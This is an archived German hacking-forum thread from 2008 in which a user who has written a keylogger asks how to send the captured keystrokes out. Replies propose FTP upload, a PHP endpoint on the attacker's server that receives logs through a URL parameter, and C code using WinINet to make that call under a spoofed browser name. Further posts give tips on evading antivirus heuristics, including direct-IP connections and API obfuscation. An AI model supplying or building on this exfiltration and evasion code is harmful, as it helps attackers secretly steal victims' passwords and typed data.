PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Keylogger Daten versenden



Xibus
11.08.2008, 18:49
hiho

Ich hab mirn Keylogger gecodet der auch ganz nice funktioniert. Das Problem ist jedoch das ich noch keine einfache Möglichkeit gefunden habe die Daten zu versenden. Ich möchte mich jetzt dafür nicht extra in sockets etc einarbeiten sondern suche ne einfache Möglichkeit die Daten per Email zu versenden. gegoogelt hab ich schon ohne etwas gescheites, leicht benutzbares zu finden.

Weis jemand zufällig ne Möglichkeit ?

EDIT: ftp wäre auch in ordnung, ohne system()

EDIT: wuhu erster Post

PolskaPower
11.08.2008, 18:57
wäre ftp nicht besser..ich glaube über mail isn bisel schwer..

-[RiDER]-
11.08.2008, 23:21
Hi :D

Ich möchte mich jetzt dafür nicht extra in sockets etc einarbeiten
Früher oder später wirst Du es doch müssen, also warum nicht jetzt? ;)

GreetZ RiDER :D :D :D

Xibus
12.08.2008, 14:26
„Verschiebe nicht auf morgen, was genausogut auf übermorgen verschoben werden kann.“

Mark Twain

word ! :D

naja, wollt das halt mal eben fertig coden und mich dann iwan mal mit sockets beschäftigen wenn ich mehr zeit hab. iwan. ;)

nexos
12.08.2008, 16:03
http://www.google.de/search?q=c%2B%2B+ftp+upload&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:de:official&client=firefox-a
haha jetzt sag mir nochmal, dass das so schwer ist

zaub9rwald
12.08.2008, 16:36
codesoft.cc da gabs in nem Bereich einen der hatn Programmgebastelt das ne bestimmte Datei (auswählbar) hochläd ... sprich Local Keylogger wird zum Web Keylogger

mo0wm
19.08.2008, 13:45
Mann kanns auch einfach per PHP hochladen, in dem man die PHP-Datei hochlädt und den Log im Link mitliefert, also zB. :
www.server.de/script.php?log=qwertz
Die PHP-Datei speichert den Log dann in eine Datei, sodass man alles online abrufen kann.

Der Funktion zum öffnen der URL sähe dann ungefähr so aus:



int ReadURL (char * pcURL)
{
//Internet-Handle anfordern
HINTERNET hInternet = InternetOpen ("Microsoft Internet Explorer",
INTERNET_OPEN_TYPE_PRECONFIG,
0,0,0);
if (!hInternet) return 0;
//URL öffnen
HINTERNET hURL = InternetOpenUrl(hInternet,pcURL,
0,0,INTERNET_FLAG_RELOAD, 0);
//Alles schließen
CloseHandle (hURL);
CloseHandle (hInternet);
}

nexos
19.08.2008, 14:13
apache urls dürfen nicht läbger als 256 zeichen sein

RoQx
19.08.2008, 19:19
am besten benutzt man ein direkte ip, dann muss man nicht die wininet.h hinzufügen sondern kann direkt verbinden.. manche antivirs reagieren heur darauf ;)

nexos
19.08.2008, 20:25
Antivierenprogramme schlagen meist schon bei den normalen api funkitonen an, wie internetopen und internetopenurl... dann noch ein exec rein und die heuristerik freut sich.

es gibt ein gutes paper von eddy denke ich, wo er api crypting in c/c++ beschreibt, wenn ihr es wollt, akn ich es suchen

SharkByte~x
19.08.2008, 20:51
Ja wäre Klasse wenn du das Tutorial hochladen könntest.

Mfg

nexos
19.08.2008, 22:43
http://eddysblog.phpnet.us/docs/api-crypting.txt

mo0wm
20.08.2008, 10:25
apache urls dürfen nicht läbger als 256 zeichen sein
Man muss ja nicht gleich ALLES auf einmal senden...


am besten benutzt man ein direkte ip, dann muss man nicht die wininet.h hinzufügen sondern kann direkt verbinden
Wusste ich garnicht, muss gleich ma ausprobieren^^


Antivierenprogramme schlagen meist schon bei den normalen api funkitonen an, wie internetopen und internetopenurl... dann noch ein exec rein und die heuristerik freut sich.
Also bisher hats noch nie bei den AVs Alarm geschlagen wenn ich diese Funktion eingesetzt hab, aber das Tutorial is echt interessant!